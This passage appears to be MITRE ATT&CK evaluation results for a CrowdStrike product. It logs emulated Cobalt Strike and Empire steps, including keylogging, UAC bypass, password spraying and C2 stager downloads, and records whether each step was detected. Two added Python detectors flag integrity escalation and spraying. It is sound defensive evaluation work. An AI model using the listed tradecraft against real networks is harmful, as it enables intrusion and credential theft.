Cobalt Strike: Built-in screen capture capability executed to capture screenshot of current window of user Debbie
Screen Capture
(T1113)
None
No detection capability demonstrated for this procedure, though telemetry showed explorer.exe injecting from a known beacon (does not detect screen capture specifically). [1]
Cobalt Strike: Screen capture capability involved process injection into explorer.exe
Process Injection
(T1055)
Telemetry
Telemetry showed InjectedThread events for explorer.exe (pid=21776848613) injecting from cmd.exe (pid=21898821890), which is a known beacon. [1] [2] [3] [4] [5]
9.A.1
Cobalt Strike: 'ls' (List) via Win32 APIs to enumerate a network shared drive (Wormshare) on Conficker (10.0.0.5)
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
9.B.1
Cobalt Strike: Built-in download capability executed to collect a file (Shockwave_rackb_diagram.vsdx) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Data from Network Shared Drive
(T1039)
None
No detection capability demonstrated for this procedure.
Cobalt Strike: Download capability exfiltrated data through existing C2 channel
Exfiltration Over Command and Control Channel
(T1041)
None
No detection capability demonstrated for this procedure.
10.A.1
Batch file (autoupdate.bat) previously written to Startup folder executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (update.dat) using Rundll32
Registry Run Keys / Startup Folder
(T1060)
Telemetry
Telemetry showed cmd.exe running autoupdate.bat from the Startup folder. [1] [2]
10.A.2
Scheduled task executed when user Debbie logs on to Nimda (10.0.1.6), launching a DLL payload (updater.dll) using Rundll32
Scheduled Task
(T1053)
Telemetry (Tainted)
Telemetry showed rundll32.exe starting updater.dll. The telemetry was tainted by the parent OverWatch alert. [1] [2] [3] [4]
10.B.1
RDP connection to Conficker (10.0.0.5) authenticated using previously added user Jesse
Valid Accounts
(T1078)
Telemetry
Telemetry showed a type 10 (interactive) UserLogon event for Jesse. [1] [2] [3] [4]
RDP connection made to Conficker (10.0.0.5) as part of execution of persistence mechanism
Remote Desktop Protocol
(T1076)
Telemetry
Telemetry showed the remote connection to Conficker for a user logon by Jesse with type 10 (interactive) as well as the use of rdpclip.exe by the logged-on user. [1] [2] [3] [4] [5] [6] [7]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior occurred because they observed suspicious communications over 3389 (RDP) to other hosts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
11.A.1
Legitimate user Bob clicked and executed malicious VBScript (autoupdate.vbs) on 10.0.1.5 (CodeRed)
Scripting
(T1064)
Telemetry
Telemetry within the OverWatch alert showed wscript.exe executing launcher.vbs, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
A General Behavior alert was generated from OverWatch indicating wscript.exe executing launcher.vbs was suspicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a malicious script invoked by wscript was run by Bob on CodeRed and launched PowerShell.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior
A Specific Behavior alert was generated indicating "A PowerShell script launched that shares characteristics with known PowerShell exploit kits." [1] [2] [3] [4] [5] [6] [7] [8]
11.B.1
Empire: C2 channel established using port 443
Commonly Used Port
(T1043)
Telemetry (Tainted)
Telemetry showed powershell.exe making connection to 192.168.0.5 (C2 server) over port 443. The telemetry was tainted by an alert on its parent powershell.exe process. [1] [2] [3] [4]
Empire: C2 channel established using HTTPS traffic to freegoogleadsenseinfo.com
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1] [2] [3] [4] [5] [6]
Empire: Encrypted C2 channel established using HTTPS
Standard Cryptographic Protocol
(T1032)
None
No detection capability demonstrated for this procedure, though telemetry showed an outbound network connection to 192.168.0.5 (C2 server) over port 443 (no protocol was identified for this traffic). [1]
12.A.1
Empire: 'route print' via PowerShell
System Network Configuration Discovery
(T1016)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because route print was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed powershell.exe executing route.exe with command-line arguments. The process tree view showed route.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.A.2
Empire: 'ipconfig -all' via PowerShell
System Network Configuration Discovery
(T1016)
Telemetry (Tainted)
Telemetry showed powershell.exe executing ipconfig.exe with command-line arguments. The process tree view showed ipconfig.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because ipconfig was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.B.1
Empire: 'whoami -all -fo list' via PowerShell
System Owner/User Discovery
(T1033)
Telemetry
Telemetry within the OverWatch alert showed powershell.exe executing whoami.exe with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating whoami.exe with command-line arguments was suspicious. The process tree view showed whoami.exe as tainted by a previous powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because whoami was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6]
12.C.1
Empire: 'qprocess *' via PowerShell
Process Discovery
(T1057)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because qprocess was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating qprocess.exe with command-line arguments was suspicious. The process tree view showed qprocess.exe as tainted by a previous powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5]
Telemetry
Telemetry within the OverWatch alert showed execution of qprocess.exe with command-line arguments, and would be available in a separate view.[CS2] For any alert in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5]
12.D.1
Empire: 'net start' via PowerShell
System Service Discovery
(T1007)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe and net1.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net start was part of the basic reconnaissance activity performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.E.1
Empire: Built-in WinEnum module executed to programmatically execute a series of enumeration techniques
Scripting
(T1064)
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating they identified a Specific Behavior for an unidentified PowerShell script running.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed the PowerShell script (.ps1) being written to the temp folder. [1] [2] [3] [4] [5] [6] [7] [8]
Specific Behavior (Delayed)
The OverWatch team generated a Specific Behavior alert indicating the PowerShell script was malicious.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
12.E.1.1
Empire: WinEnum module included enumeration of user information
System Owner/User Discovery
(T1033)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
12.E.1.2
Empire: WinEnum module included enumeration of AD group memberships
Permission Groups Discovery
(T1069)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
12.E.1.3
Empire: WinEnum module included enumeration of password policy information
Password Policy Discovery
(T1201)
None
No detection capability demonstrated for this procedure.
12.E.1.4.1
Empire: WinEnum module included enumeration of recently opened files
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
12.E.1.4.2
Empire: WinEnum module included enumeration of interesting files
File and Directory Discovery
(T1083)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6]
12.E.1.5
Empire: WinEnum module included enumeration of clipboard contents
Clipboard Data
(T1115)
None
No detection capability demonstrated for this procedure, though telemetry showed execution of an encoded PowerShell command and OverWatch alerted on it as suspicious. The PowerShell decoded to Windows.Clipboard(...) outside of the capability, which indicated clipboard interaction, but this was not counted as a detection because it was external to the capability. [1] [2] [3]
12.E.1.6.1
Empire: WinEnum module included enumeration of system information
System Information Discovery
(T1082)
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8]
12.E.1.6.2
Empire: WinEnum module included enumeration of Windows update information
System Information Discovery
(T1082)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8]
12.E.1.7
Empire: WinEnum module included enumeration of system information via a Registry query
Query Registry
(T1012)
Telemetry
Telemetry from decoded PowerShell (within the capability) showed the Get-Sysinfo function. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
12.E.1.8
Empire: WinEnum module included enumeration of services
System Service Discovery
(T1007)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.E.1.9.1
Empire: WinEnum module included enumeration of available shares
Network Share Discovery
(T1135)
None
No detection capability demonstrated for this procedure.
12.E.1.9.2
Empire: WinEnum module included enumeration of mapped network drives
Network Share Discovery
(T1135)
None
No detection capability demonstrated for this procedure.
12.E.1.10.1
Empire: WinEnum module included enumeration of AV solutions
Security Software Discovery
(T1063)
None
No detection capability demonstrated for this procedure.
12.E.1.10.2
Empire: WinEnum module included enumeration of firewall rules
Security Software Discovery
(T1063)
None
No detection capability demonstrated for this procedure.
12.E.1.11
Empire: WinEnum module included enumeration of network adapters
System Network Configuration Discovery
(T1016)
None
No detection capability demonstrated for this procedure. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
12.E.1.12
Empire: WinEnum module included enumeration of established network connections
System Network Connections Discovery
(T1049)
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
12.F.1
Empire: 'net group "Domain Admins" -domain' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
12.F.2
Empire: 'net localgroup administrators' via PowerShell
Permission Groups Discovery
(T1069)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
12.G.1
Empire: 'net user' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
12.G.2
Empire: 'net user -domain' via PowerShell
Account Discovery
(T1087)
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
13.A.1
Empire: 'net group "Domain Computers" -domain' via PowerShell
Remote System Discovery
(T1018)
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed the enrichment was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
13.B.1
Empire: 'net use' via PowerShell
System Network Connections Discovery
(T1049)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net use was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
13.B.2
Empire: 'netstat -ano' via PowerShell
System Network Connections Discovery
(T1049)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because netstat was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7]
Telemetry (Tainted)
Telemetry showed netstat.exe executing with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
13.C.1
Empire: 'reg query' via PowerShell to enumerate a specific Registry key
Query Registry
(T1012)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because reg query was part of additional malicious discovery performed.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed reg.exe executing with command-line arguments. The process tree view showed reg.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert identifying reg.exe execution as suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
14.A.1
Empire: Built-in UAC bypass token duplication module executed to launch new callback with elevated process integrity level
Bypass User Account Control
(T1088)
Specific Behavior (Delayed)
The OverWatch team also sent an email indicating a Specific Behavior was observed because a base64 obfuscated PowerShell command was used to invoke UAC bypass.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Telemetry
Telemetry showed an integrity level change through a query for powershell.exe processes of high integrity (12288/0x3000) that were created by medium integrity processes (8192/0x2000), which is indicative of bypassing UAC. Telemetry also showed the Invoke-BypassUACTokenManipulation function in the script. [1] [2] [3] [4]
Empire: UAC bypass module downloaded and wrote a new Empire stager (wdbypass) to disk
Remote File Copy
(T1105)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was observed because PowerShell retrieved the file wdbypass from www.freegoogleadsenseinfo.com (C2 domain) over port 8080.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over HTTP
Standard Application Layer Protocol
(T1071)
None
No detection capability demonstrated for this procedure, though telemetry showed an encoded PowerShell command that could be decoded outside the capability to show the IEX command used to download the file (wdbypass) over HTTP port 8080. [1] [2] [3] [4] [5] [6]
Empire: UAC bypass module downloaded a new Empire stager (wdbypass) over port 8080
Commonly Used Port
(T1043)
Telemetry
Telemetry showed a network connection event to 192.168.0.5 (C2 server) on TCP port 8080 that was associated with the encoded PowerShell IEX command. [1] [2] [3] [4]
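The integrity-level heuristic in the 14.A.1 telemetry note (a high-integrity powershell.exe created by a medium-integrity process), as an added example run over constructed process records; this is not code from the evaluation page or the CrowdStrike capability, and the record layout (pid, ppid, image, integrity, script_text) is an assumption.

```python
"""Flag high-integrity powershell.exe children of medium-integrity parents.

Added example; not code from the MITRE evaluation page or the CrowdStrike
capability. The process-record layout is an assumption. The integrity values
are the ones the page cites: medium 8192 (0x2000), high 12288 (0x3000).
"""
from typing import Dict, List

MEDIUM_INTEGRITY = 0x2000  # 8192
HIGH_INTEGRITY = 0x3000    # 12288
# Function name the page's telemetry note reports in the decoded script.
KNOWN_BYPASS_FUNCTIONS = ("Invoke-BypassUACTokenManipulation",)

# Constructed sample process telemetry (not real data).
SAMPLE_PROCESSES: List[Dict] = [
    {"pid": 800, "ppid": 4, "image": "svchost.exe", "integrity": 0x4000,
     "script_text": ""},
    {"pid": 1000, "ppid": 1, "image": "explorer.exe",
     "integrity": MEDIUM_INTEGRITY, "script_text": ""},
    # Medium-integrity PowerShell whose decoded script names the bypass module.
    {"pid": 1200, "ppid": 1000, "image": "powershell.exe",
     "integrity": MEDIUM_INTEGRITY,
     "script_text": "function Invoke-BypassUACTokenManipulation { ... }"},
    # High-integrity child of that medium-integrity parent: the page's signal.
    {"pid": 1300, "ppid": 1200, "image": "powershell.exe",
     "integrity": HIGH_INTEGRITY, "script_text": ""},
    # High-integrity child of a system-integrity service: not flagged.
    {"pid": 1400, "ppid": 800, "image": "powershell.exe",
     "integrity": HIGH_INTEGRITY, "script_text": ""},
]


def find_integrity_escalations(processes: List[Dict],
                               image: str = "powershell.exe") -> List[Dict]:
    """Return processes of `image` at high integrity or above whose parent ran
    at medium integrity or below, with a flag saying whether the parent's
    script text corroborates the hit by naming a known bypass function.

    A user-approved elevation through the consent prompt is typically
    re-parented to the requesting process too, so an uncorroborated hit is a
    triage lead, not proof of a bypass.
    """
    by_pid = {p["pid"]: p for p in processes}
    hits = []
    for proc in processes:
        if proc["image"].lower() != image.lower():
            continue
        if proc["integrity"] < HIGH_INTEGRITY:
            continue
        parent = by_pid.get(proc["ppid"])
        if parent is None or parent["integrity"] > MEDIUM_INTEGRITY:
            continue
        corroborated = any(fn in parent.get("script_text", "")
                           for fn in KNOWN_BYPASS_FUNCTIONS)
        hits.append({
            "pid": proc["pid"],
            "ppid": parent["pid"],
            "parent_image": parent["image"],
            "corroborated": corroborated,
        })
    return hits


if __name__ == "__main__":
    for hit in find_integrity_escalations(SAMPLE_PROCESSES):
        print(hit)
```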
15.A.1
Empire: Built-in keylogging module executed to capture keystrokes of user Bob
Input Capture
(T1056)
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the function Get-Keystrokes. [1] [2] [3] [4]
General Behavior (Delayed)
The OverWatch team sent an email indicating a Specific Behavior was identified because they observed the adversary logging keystrokes based on the GetKeystrokes PowerShell function.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4]
Empire: Built-in keylogging module included residual enumeration of application windows
Application Window Discovery
(T1010)
Telemetry
Telemetry showed the decoded PowerShell script, which displayed the API call GetForegroundWindow to enumerate the active window. [1]
15.B.1
Empire: 'get-content' via PowerShell to collect sensitive file (it_tasks.txt) from a network shared drive (Wormshare) on Conficker (10.0.0.5)
Credentials in Files
(T1081)
Specific Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because IT_tasks.txt was retrieved from a network share as a file of interest.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3]
Telemetry
Telemetry showed a file read event for IT_tasks.txt by powershell.exe as well as a FsPostOpen event indicating IT_tasks.txt was opened. [1] [2] [3]
16.A.1
Empire: 'net use' via PowerShell to brute force password spraying authentication attempts to Morris (10.0.1.4) and Nimda (10.0.1.6) targeting credentials of users Kmitnick, Bob, and Frieda
Brute Force
(T1110)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands were suspicious. The alerts were tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments indicative of password spraying, including details that the logons were for local admin (type 6) and that they failed. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: Brute force password spraying attempts targeted Windows admin shares on Morris (10.0.1.4) and Nimda (10.0.1.6)
Windows Admin Shares
(T1077)
Telemetry
Telemetry showed repeated logon attempts via net.exe with command-line arguments targeting ADMIN$ shares on the machines 10.0.1.4 (Morris) and 10.0.1.6 (Nimda). [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated General Behavior alerts indicating the net use commands attempting logon to ADMIN$ shares were suspicious. The alerts were tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
16.B.1
Empire: 'net use' via PowerShell to successfully authenticate to Conficker (10.0.0.5) using credentials of user Kmitnick
Valid Accounts
(T1078)
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect using the valid credentials of user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4]
Empire: Successful authentication targeted Windows admin share on Conficker (10.0.0.5)
Windows Admin Shares
(T1077)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally to access resources on the network.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed a logon attempt via net.exe with command-line arguments to connect to ADMIN$ on 10.0.0.5 (Conficker) as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection to ADMIN$ was suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Empire: Successful authentication to Conficker (10.0.0.5) using credentials of user Kmitnick as a result of the brute force password spraying
Brute Force
(T1110)
General Behavior (Delayed)
The OverWatch team also sent an email indicating a General Behavior was observed because the user Bob attempted to move laterally using several accounts.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8]
General Behavior (Delayed, Tainted)
OverWatch generated a General Behavior alert indicating the successful net use connection was suspicious. The alert was tainted by a parent powershell.exe detection.[CS1] OverWatch is the managed threat hunting service. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments to connect as the user Kmitnick (following multiple failed net use attempts). The telemetry was tainted by a parent powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8]
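The spray pattern in the 16.A.1 telemetry notes (repeated failed net.exe logons to ADMIN$ on two hosts with several accounts) and the follow-on in 16.B.1 (a success with one of the sprayed accounts after the failures), as one added detection example run over constructed events; this is not code from the evaluation page or the CrowdStrike capability, and the event fields are an assumption.

```python
"""Detect password spraying, and a later success, from net.exe logon telemetry.

Added example; not code from the MITRE evaluation page or the CrowdStrike
capability. The event fields are an assumption. Sample events are
constructed to mirror steps 16.A.1 and 16.B.1: failures from Bob's session
against ADMIN$ on Morris (10.0.1.4) and Nimda (10.0.1.6) with three accounts,
then a success to Conficker (10.0.0.5) as Kmitnick.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List


def _ev(ts, user, pid, host, account, success, share="ADMIN$") -> Dict:
    # logon_type 6 is the value the page's telemetry note records.
    return {"ts": ts, "origin_user": user, "origin_pid": pid,
            "target_host": host, "share": share, "account": account,
            "logon_type": 6, "success": success}


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS: List[Dict] = [
    _ev("2019-01-01T10:00:00", "Bob", 4242, "10.0.1.4", "Kmitnick", False),
    _ev("2019-01-01T10:00:02", "Bob", 4242, "10.0.1.4", "Bob", False),
    _ev("2019-01-01T10:00:04", "Bob", 4242, "10.0.1.4", "Frieda", False),
    _ev("2019-01-01T10:00:06", "Bob", 4242, "10.0.1.6", "Kmitnick", False),
    _ev("2019-01-01T10:00:08", "Bob", 4242, "10.0.1.6", "Bob", False),
    _ev("2019-01-01T10:00:10", "Bob", 4242, "10.0.1.6", "Frieda", False),
    _ev("2019-01-01T10:00:20", "Bob", 4242, "10.0.0.5", "Kmitnick", True),
    # Benign noise: one mistyped password, then a normal share connection.
    _ev("2019-01-01T10:30:00", "Debbie", 5151, "10.0.0.5", "Debbie", False,
        share="wormshare"),
    _ev("2019-01-01T10:30:05", "Debbie", 5151, "10.0.0.5", "Debbie", True,
        share="wormshare"),
]


def _when(ev: Dict) -> datetime:
    return datetime.fromisoformat(ev["ts"])


def _flush(origin, cluster, min_accounts, sessions) -> None:
    """Record a cluster of failures as a spray session if it spans enough accounts."""
    if not cluster:
        return
    accounts = {e["account"] for e in cluster}
    if len(accounts) >= min_accounts:
        sessions.append({
            "origin_user": origin[0], "origin_pid": origin[1],
            "start": cluster[0]["ts"], "end": cluster[-1]["ts"],
            "accounts": accounts,
            "hosts": {e["target_host"] for e in cluster},
            "failures": len(cluster),
        })


def find_spray_sessions(events: List[Dict], window=timedelta(minutes=10),
                        min_accounts: int = 3) -> List[Dict]:
    """Cluster failed logons per originating (user, pid); a cluster is a spray
    session when it tries at least `min_accounts` distinct accounts inside
    `window` measured from the cluster's first failure."""
    failures = defaultdict(list)
    for ev in events:
        if not ev["success"]:
            failures[(ev["origin_user"], ev["origin_pid"])].append(ev)
    sessions: List[Dict] = []
    for origin, evs in failures.items():
        evs.sort(key=_when)
        cluster: List[Dict] = []
        for ev in evs:
            if cluster and _when(ev) - _when(cluster[0]) > window:
                _flush(origin, cluster, min_accounts, sessions)
                cluster = []
            cluster.append(ev)
        _flush(origin, cluster, min_accounts, sessions)
    return sessions


def find_success_after_spray(events: List[Dict], sessions: List[Dict]) -> List[Dict]:
    """Successful logons from a spraying origin that use a sprayed account at or
    after the spray began: the 16.B.1 pattern, which is the hit worth paging on."""
    hits = []
    for s in sessions:
        start = datetime.fromisoformat(s["start"])
        for ev in events:
            if (ev["success"] and ev["origin_user"] == s["origin_user"]
                    and ev["origin_pid"] == s["origin_pid"]
                    and ev["account"] in s["accounts"] and _when(ev) >= start):
                hits.append(ev)
    return hits


if __name__ == "__main__":
    sprays = find_spray_sessions(SAMPLE_EVENTS)
    print(sprays)
    print(find_success_after_spray(SAMPLE_EVENTS, sprays))
```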
16.C.1
Empire: 'net use -delete' via PowerShell
Network Share Connection Removal
(T1126)
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because the user Bob removed an artifact for the ADMIN$ share.[CS9] OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The telemetry was tainted by a previous powershell.exe detection. [1] [2]
16.D.1
